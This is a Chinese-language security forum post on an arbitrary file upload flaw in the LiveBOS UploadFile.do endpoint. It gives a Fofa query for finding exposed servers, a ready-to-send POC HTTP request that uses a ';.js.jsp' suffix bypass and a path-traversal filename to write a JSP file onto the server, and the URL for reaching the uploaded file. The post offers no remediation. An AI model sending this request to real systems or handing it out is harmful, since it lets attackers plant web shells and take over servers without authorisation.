LiveBOS UploadFile.do任意文件上传漏洞-网络安全论坛-网络安全-阻击者联盟

LiveBOS UploadFile.do任意文件上传漏洞

漏洞描述
LiveBOS接口UploadFile.do存在任意文件上传漏洞,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
 Fofa:
body=”LiveBOS”

36085397eb54a3f9b34c2f5b24a66bd6

 

POC:

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../文件名.jsp"
Content-Type: image/jpeg

文件内容
---WebKitFormBoundaryxegqoxxi--

17a62817b7e8301fac74f372cefe5b1e

 

返回地址:

http://ip/文件名.jsp;.js.jsp

34df4302e04acb35f5404874b9ac1eb7

 

请登录后发表评论

    没有回复内容